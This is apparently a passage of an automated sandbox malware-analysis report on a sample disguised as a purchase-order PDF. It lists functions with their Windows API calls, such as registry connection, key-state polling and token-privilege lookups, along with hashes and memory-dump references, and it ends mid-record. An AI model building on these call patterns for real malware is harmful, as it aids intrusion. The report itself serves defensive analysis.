                                                                                                                                                                                                                                                                                                            • API String ID: 136442275-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                                                                                                                                                                                                                                                            • Instruction ID: e47e2093bf76b35e8f1fec89578fc46911e8a4506192668d3a16ce6d5165f020
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 744124B2408345ABC235E754C885EEF73ECABD8314F44891EB68D42141EB796688C7A7
                                                                                                                                                                                                                                                                                                            Function 0046B39A Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 401registryCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B479
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ConnectRegistry_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: HH
                                                                                                                                                                                                                                                                                                            • API String ID: 535477410-2761332787
                                                                                                                                                                                                                                                                                                            • Opcode ID: dd81b6afca0b69ee093bc818c763857178bde5d9027ed819eaece9cecf668df8
                                                                                                                                                                                                                                                                                                            • Instruction ID: 7a368be733395892e28f24b11b3b05e85d853a2cd395d98498a1c99032eed9d9
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd81b6afca0b69ee093bc818c763857178bde5d9027ed819eaece9cecf668df8
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63E171B1604200ABC714EF28C981F1BB7E4EF88704F148A1EF685DB381D779E945CB9A
                                                                                                                                                                                                                                                                                                            Function 00460473 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 004604B5
                                                                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 004604F1
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00460502
                                                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 00460510
                                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00460589
                                                                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 004605C2
                                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00460606
                                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 0046063E
                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 004606AD
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: ThumbnailClass
                                                                                                                                                                                                                                                                                                            • API String ID: 4123061591-1241985126
                                                                                                                                                                                                                                                                                                            • Opcode ID: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                                                                                                                                                                                                                                                            • Instruction ID: b645ef8d54a60b7d8a856e9fdf4d8999e4c56e3b903fe9b51be5921097eabf2a
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F91B0715043019FDB14DF24C884BAB77A8EF84715F04896FFD85AA281E778E905CBAB
                                                                                                                                                                                                                                                                                                            Function 0046F50B Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 157windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000205,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F55F
                                                                                                                                                                                                                                                                                                            • ImageList_DragLeave.COMCTL32(00000000,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F57D
                                                                                                                                                                                                                                                                                                            • ImageList_EndDrag.COMCTL32 ref: 0046F583
                                                                                                                                                                                                                                                                                                            • ReleaseCapture.USER32 ref: 0046F589
                                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 0046F620
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046F630
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                                                                                                                                                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID$HH
                                                                                                                                                                                                                                                                                                            • API String ID: 2483343779-2060113733
                                                                                                                                                                                                                                                                                                            • Opcode ID: f23a46a28047cab398fe0a6e1917226b7ab7c03c2e7fe431430c5ad35c8bbb28
                                                                                                                                                                                                                                                                                                            • Instruction ID: 4b94e37398fb4c0e8bf176de98e3888209b69965db7f8e5b86c8cb252d1f017b
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f23a46a28047cab398fe0a6e1917226b7ab7c03c2e7fe431430c5ad35c8bbb28
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB5106716043119BD700DF18DC85FAF77A5EB89310F04492EF941973A2DB789D49CBAA
                                                                                                                                                                                                                                                                                                            Function 0046FD7F Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 143windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 0046FD8A
                                                                                                                                                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,004A83D8,?), ref: 0046FDF0
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 0046FE0E
                                                                                                                                                                                                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,004A83D8,?), ref: 0046FE20
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046FEA5
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046FEDF
                                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0046FEF2
                                                                                                                                                                                                                                                                                                            • RedrawWindow.USER32(?,?,00000000,00000000), ref: 0046FF02
                                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?), ref: 0046FFCC
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                                                                                                                                                                                                                                            • String ID: 2
                                                                                                                                                                                                                                                                                                            • API String ID: 1331449709-450215437
                                                                                                                                                                                                                                                                                                            • Opcode ID: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                                                                                                                                                                                                                                                            • Instruction ID: e79942d1a0196d9b5e30c5c178d8ccafd59c9ae1e7fac48b8759c586c5a3b44e
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB51AC702043019FD320CF44D885BAABBE5FB88700F04487EE684872A2D7B5A849CB5A
                                                                                                                                                                                                                                                                                                            Function 004393E2 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 109threadCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439409
                                                                                                                                                                                                                                                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 0043940C
                                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?), ref: 0043941D
                                                                                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 00439420
                                                                                                                                                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
                                                                                                                                                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
                                                                                                                                                                                                                                                                                                            • _memcmp.LIBCMT ref: 004394A9
                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004394F8
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            • SeIncreaseQuotaPrivilege, xrefs: 0043946A
                                                                                                                                                                                                                                                                                                            • SeAssignPrimaryTokenPrivilege, xrefs: 00439455
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
                                                                                                                                                                                                                                                                                                            • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                                                                                                                                                                                                                                                                                                            • API String ID: 1446985595-805462909
                                                                                                                                                                                                                                                                                                            • Opcode ID: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                                                                                                                                                                                                                                            • Instruction ID: 628aaead06b6f58e004e5b45c2ed9710a22b4d2b921ab75b424857e8fd72c9d6
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB31A371508312ABC710DF21CD41AAFB7E8FB99704F04591EF98193240E7B8DD4ACBAA
                                                                                                                                                                                                                                                                                                            Function 0045D83D Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D848
                                                                                                                                                                                                                                                                                                            • GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
                                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                                                                            • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$HH
                                                                                                                                                                                                                                                                                                            • API String ID: 2907320926-41864084
                                                                                                                                                                                                                                                                                                            • Opcode ID: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                                                                                                                                                                                                                                                            • Instruction ID: d4cab332979e247f8c2da9788294718902473fa09eb5ff996f03d25688ce9cbb
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C7318B75A083008FC310EF65E48481EB7A1AFC8315F648D2FF945A7362C779D9068BAB
                                                                                                                                                                                                                                                                                                            Function 00467214 Relevance: 16.8, APIs: 11, Instructions: 313COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 004672E6
                                                                                                                                                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046735D
                                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467375
                                                                                                                                                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004673ED
                                                                                                                                                                                                                                                                                                            • SafeArrayGetVartype.OLEAUT32(CE8B7824,?), ref: 00467418
                                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467445
                                                                                                                                                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046746A
                                                                                                                                                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 00467559
                                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 0046748A
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467571
                                                                                                                                                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004675E4
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ArraySafe$Data$AccessUnaccess$Exception@8ThrowVartype_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1932665248-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 2f069d425a14989955c91583bf1eee78d18cf75f4644af0e6fd4452b58d9bd04
                                                                                                                                                                                                                                                                                                            • Instruction ID: 42a0e90c8bf2b482c85e144861ec280134e9fb1dbd9e00a0d693b148f8e5f150
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f069d425a14989955c91583bf1eee78d18cf75f4644af0e6fd4452b58d9bd04
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8B1BF752082009FD304DF29C884B6B77E5FF98318F14496EE98587362E779E885CB6B
                                                                                                                                                                                                                                                                                                            Function 004480F2 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00448182
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00448185
                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004481A7
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 004481BA
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481CC
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0044824E
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482A4
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482BE
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482E3
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000101E,00000001,00000000), ref: 004482FC
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448317
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$LongWindow_memset
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 830647256-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
